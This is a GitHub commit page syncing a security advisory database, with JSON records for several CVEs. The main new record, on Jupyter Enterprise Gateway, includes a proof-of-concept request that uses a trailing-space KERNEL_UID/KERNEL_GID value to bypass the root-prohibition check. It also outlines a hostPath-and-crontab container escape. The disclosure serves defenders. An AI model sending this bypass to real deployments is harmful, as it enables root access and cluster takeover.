Skip to content

Commit e6c9cb7

Browse files
Advisory Database Sync
1 parent 6ed967e commit e6c9cb7

56 files changed

Lines changed: 1044 additions & 93 deletions

File tree

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.
Lines changed: 62 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,62 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-chq7-94j8-cj28",
4+
"modified": "2026-06-03T21:30:10Z",
5+
"published": "2026-06-03T21:30:10Z",
6+
"aliases": [
7+
"CVE-2026-44180"
8+
],
9+
"summary": "Jupyter Enterprise Gateway: ContainerProcessProxy._enforce_prohibited_ids Bypass",
10+
"details": "### Summary\n\nJupyter Enterprise Gateway has a prohibited UID and GID feature that by default prevents launching kernels with UID or GID 0 (root).\nThis can be bypassed. It is possible to launch kernels with a prohibited UID and/or GID by using a specially crafted `KERNEL_UID` or `KERNEL_GID` value.\n\nThe feature is described in the documentation: \n\nhttps://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/config-add-env.md?plain=1#L103-L107\n\nhttps://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/config-add-env.md?plain=1#L88-L92\n\nhttps://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/deploy-kubernetes.md?plain=1#L769\n\n### Details\n\nThe `prohibited_uids` and `prohibited_uids` are set based of the OS env var `EG_PROHIBITED_UIDS` and `EG_PROHIBITED_GIDS`, and default to the string `0`.\n\nhttps://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L29-L30\n\nThe checks https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L113 and https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L119 look for the user supplied `KERNEL_UID` / `KERNEL_GID` string in the `prohibited_uids` / `prohibited_gids` strings. These checks can be bypassed by including whitespace, for example the string `0 ` (trailing space).\n\nThe user supplied string is used in the Kubernetes manifest at https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L35 and https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L38 where they are parsed as an integer in the Jinja2 template - which will ignore the whitespace.\n\n### PoC\n\n\n#### How it is meant to work\n\nTrying `0` gets denied, as expected.\n\n```bash\nxh http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels name=python_kubernetes env:='{\"KERNEL_POD_NAME\":\"bdawg\", \"KERNEL_UID\": \"0\", \"KERNEL_GID\": \"0\"}'\n```\n\n```\nHTTP/1.1 403 Kernel's UID value of '0' has been denied via EG_PROHIBITED_UIDS!\nContent-Length: 94\nContent-Type: application/json\nDate: Mon, 14 Jul 2025 12:57:09 GMT\nServer: TornadoServer/6.4.1\nX-Content-Type-Options: nosniff\n```\n\n```json\n{\n \"reason\": \"Kernel's UID value of '0' has been denied via EG_PROHIBITED_UIDS!\",\n \"message\": \"\"\n}\n```\n\n#### Exploit bypassing the checks\n\nUsing `0 ` with a trailing space, bypasses the check.\n\n```bash\nxh http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels name=python_kubernetes env:='{\"KERNEL_POD_NAME\":\"bdawg\", \"KERNEL_UID\": \"0 \", \"KERNEL_GID\": \"0 \"}'\n```\n\n```\nHTTP/1.1 201 Created\nContent-Length: 172\nContent-Type: application/json\nDate: Mon, 14 Jul 2025 14:15:19 GMT\nLocation: /api/kernels/17eee032-994f-4dd2-8ade-87169c300a40\nServer: TornadoServer/6.4.1\nX-Content-Type-Options: nosniff\n```\n\n```\n{\n \"id\": \"17eee032-994f-4dd2-8ade-87169c300a40\",\n \"name\": \"python_kubernetes\",\n \"last_activity\": \"2025-07-14T14:15:21.468155Z\",\n \"execution_state\": \"starting\",\n \"connections\": 0\n}\n```\n\nThe pod is successfully scheduled.\n\nInspecting the container we can see it is running as `root`:\n\n```bash\nkubectl exec -it pod/bdawg -- bash\n```\n\n```\n(base) root@bdawg3:~# id\nuid=0(root) gid=0(root) groups=0(root),100(users)\n```\n\nIf we had not supplied the `KERNEL_UID` / `KERNEL_GID` the container would have been running as UID:GID `1000:100` (`jovyan:users`).\n\n### Impact\n\nThis input validation vulnerability allows running Jupyter kernels as root, which can be dangerous as it allows more attack surface, and may lead to container escapes, compromising the worker node and all workloads running on it. Repeated exploitation can compromise all worker nodes, and thus the entire Kubernetes cluster. It is possible to specify volume mounts, so one vector for a container escape is to use a `hostPath` R/W volume mount, use this UID/GID bypass to run as root, and then gain code execution in the underlying worker node by creating a crontab entry in the mounted host file system.\n\nOrganisations running Jupyter Enterprise Gateway to host Jupyter Kernels on at least Kubernetes clusters (I've tested this), and possibly on any other supported container orchestration systems or systems that utilise the `KERNEL_UID` and `KERNEL_GID` variables with the `EG_PROHIBITED_UIDS` and `EG_PROHIBITED_GIDS` feature.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "jupyter_enterprise_gateway"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "2.0.0rc1"
29+
},
30+
{
31+
"fixed": "3.3.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/jupyter-server/enterprise_gateway/security/advisories/GHSA-chq7-94j8-cj28"
42+
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/jupyter-server/enterprise_gateway"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/jupyter-server/enterprise_gateway/releases/tag/v3.3.0"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-180",
55+
"CWE-20"
56+
],
57+
"severity": "CRITICAL",
58+
"github_reviewed": true,
59+
"github_reviewed_at": "2026-06-03T21:30:10Z",
60+
"nvd_published_at": null
61+
}
62+
}

advisories/unreviewed/2026/03/GHSA-4vj5-vh2w-8g5j/GHSA-4vj5-vh2w-8g5j.json

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-4vj5-vh2w-8g5j",
4-
"modified": "2026-03-27T00:31:21Z",
4+
"modified": "2026-06-03T21:30:24Z",
55
"published": "2026-03-27T00:31:21Z",
66
"aliases": [
77
"CVE-2026-34352"
@@ -19,6 +19,10 @@
1919
"type": "ADVISORY",
2020
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34352"
2121
},
22+
{
23+
"type": "WEB",
24+
"url": "https://github.com/TigerVNC/tigervnc/issues/2079"
25+
},
2226
{
2327
"type": "WEB",
2428
"url": "https://github.com/TigerVNC/tigervnc/commit/0b5cab169d847789efa54459a87659d3fd484393"

advisories/unreviewed/2026/05/GHSA-rg8p-9rpg-r32p/GHSA-rg8p-9rpg-r32p.json

Lines changed: 9 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-rg8p-9rpg-r32p",
4-
"modified": "2026-05-26T15:32:11Z",
4+
"modified": "2026-06-03T21:30:25Z",
55
"published": "2026-05-26T15:32:11Z",
66
"aliases": [
77
"CVE-2026-45247"
@@ -31,6 +31,14 @@
3131
"type": "WEB",
3232
"url": "https://sansec.io/research/mirasvit-cache-warmer-object-injection"
3333
},
34+
{
35+
"type": "WEB",
36+
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-45247"
37+
},
38+
{
39+
"type": "WEB",
40+
"url": "https://www.imperva.com/blog/imperva-customers-protected-against-cve-2026-45247-in-mirasvit-full-page-cache-warmer-for-magento"
41+
},
3442
{
3543
"type": "WEB",
3644
"url": "https://www.vulncheck.com/advisories/mirasvit-cache-warmer-for-magento-php-object-injection"

advisories/unreviewed/2026/05/GHSA-v3pj-p78r-2j24/GHSA-v3pj-p78r-2j24.json

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -26,7 +26,8 @@
2626
],
2727
"database_specific": {
2828
"cwe_ids": [
29-
"CWE-284"
29+
"CWE-284",
30+
"CWE-400"
3031
],
3132
"severity": "CRITICAL",
3233
"github_reviewed": false,

advisories/unreviewed/2026/05/GHSA-xj8w-vw8m-px5f/GHSA-xj8w-vw8m-px5f.json

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-xj8w-vw8m-px5f",
4-
"modified": "2026-05-12T03:31:26Z",
4+
"modified": "2026-06-03T21:30:24Z",
55
"published": "2026-05-12T03:31:26Z",
66
"aliases": [
77
"CVE-2026-27682"

advisories/unreviewed/2026/06/GHSA-22c2-92rp-fgpf/GHSA-22c2-92rp-fgpf.json

Lines changed: 11 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-22c2-92rp-fgpf",
4-
"modified": "2026-06-03T18:33:12Z",
4+
"modified": "2026-06-03T21:30:29Z",
55
"published": "2026-06-03T18:33:11Z",
66
"aliases": [
77
"CVE-2026-39107"
88
],
99
"details": "A Cross Site Scripting vulnerability exists in the Kimi AI v1.0 web interface's 'Preview' feature. The application fails to properly sanitize or encode HTML/JavaScript payloads generated by the AI model. When a user switches to the 'Preview' tab to view AI-generated code, the malicious payload is rendered directly into the DOM, leading to arbitrary JavaScript execution in the victim's browser session.",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{
@@ -24,8 +29,10 @@
2429
}
2530
],
2631
"database_specific": {
27-
"cwe_ids": [],
28-
"severity": null,
32+
"cwe_ids": [
33+
"CWE-79"
34+
],
35+
"severity": "MODERATE",
2936
"github_reviewed": false,
3037
"github_reviewed_at": null,
3138
"nvd_published_at": "2026-06-03T18:16:23Z"

advisories/unreviewed/2026/06/GHSA-2876-5r6w-63mx/GHSA-2876-5r6w-63mx.json

Lines changed: 11 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-2876-5r6w-63mx",
4-
"modified": "2026-06-03T18:33:11Z",
4+
"modified": "2026-06-03T21:30:29Z",
55
"published": "2026-06-03T18:33:11Z",
66
"aliases": [
77
"CVE-2026-36618"
88
],
99
"details": "Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 responds to version.bind CHAOS TXT queries, disclosing the DNS resolver software version (unbound 1.22.0), aiding targeted attacks against known vulnerabilities.",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{
@@ -20,8 +25,10 @@
2025
}
2126
],
2227
"database_specific": {
23-
"cwe_ids": [],
24-
"severity": null,
28+
"cwe_ids": [
29+
"CWE-200"
30+
],
31+
"severity": "MODERATE",
2532
"github_reviewed": false,
2633
"github_reviewed_at": null,
2734
"nvd_published_at": "2026-06-03T18:16:23Z"

advisories/unreviewed/2026/06/GHSA-2q23-65hh-rjx9/GHSA-2q23-65hh-rjx9.json

Lines changed: 11 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-2q23-65hh-rjx9",
4-
"modified": "2026-06-03T18:33:11Z",
4+
"modified": "2026-06-03T21:30:29Z",
55
"published": "2026-06-03T18:33:11Z",
66
"aliases": [
77
"CVE-2026-36608"
88
],
99
"details": "Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows UPnP AddPortMapping to forward external ports to the router's own admin interface by accepting its own IP (192.168.1.1) or localhost (127.0.0.1) as InternalClient. An unauthenticated LAN attacker can expose the admin panel to the internet with a single SOAP request.",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{
@@ -20,8 +25,10 @@
2025
}
2126
],
2227
"database_specific": {
23-
"cwe_ids": [],
24-
"severity": null,
28+
"cwe_ids": [
29+
"CWE-441"
30+
],
31+
"severity": "HIGH",
2532
"github_reviewed": false,
2633
"github_reviewed_at": null,
2734
"nvd_published_at": "2026-06-03T18:16:21Z"

advisories/unreviewed/2026/06/GHSA-378r-5qcc-x537/GHSA-378r-5qcc-x537.json

Lines changed: 11 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-378r-5qcc-x537",
4-
"modified": "2026-06-03T18:33:09Z",
4+
"modified": "2026-06-03T21:30:28Z",
55
"published": "2026-06-03T18:33:09Z",
66
"aliases": [
77
"CVE-2026-36748"
88
],
99
"details": "RockRMS v16.13 and before v.17.7.0 is vulnerable to Cross Site Scripting (XSS) via Social Media links in user profile.",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{
@@ -24,8 +29,10 @@
2429
}
2530
],
2631
"database_specific": {
27-
"cwe_ids": [],
28-
"severity": null,
32+
"cwe_ids": [
33+
"CWE-79"
34+
],
35+
"severity": "CRITICAL",
2936
"github_reviewed": false,
3037
"github_reviewed_at": null,
3138
"nvd_published_at": "2026-06-03T16:16:29Z"

advisories/unreviewed/2026/06/GHSA-3rp5-97gw-r98q/GHSA-3rp5-97gw-r98q.json

Lines changed: 9 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-3rp5-97gw-r98q",
4-
"modified": "2026-06-02T21:30:41Z",
4+
"modified": "2026-06-03T21:30:27Z",
55
"published": "2026-06-02T21:30:41Z",
66
"aliases": [
77
"CVE-2021-4478"
@@ -26,6 +26,14 @@
2626
{
2727
"type": "WEB",
2828
"url": "https://static.draeger.com/security"
29+
},
30+
{
31+
"type": "WEB",
32+
"url": "https://static.draeger.com/security/download/2021-03-02-PSA-21-061-1-CC-Vision-Product-Security-Advisory.pdf"
33+
},
34+
{
35+
"type": "WEB",
36+
"url": "https://www.vulncheck.com/advisories/dr-ger-cc-vision-basic-and-cc-vision-e-cal-out-of-bounds-write-via-malicious-gdt-file"
2937
}
3038
],
3139
"database_specific": {

0 commit comments

Comments
 (0)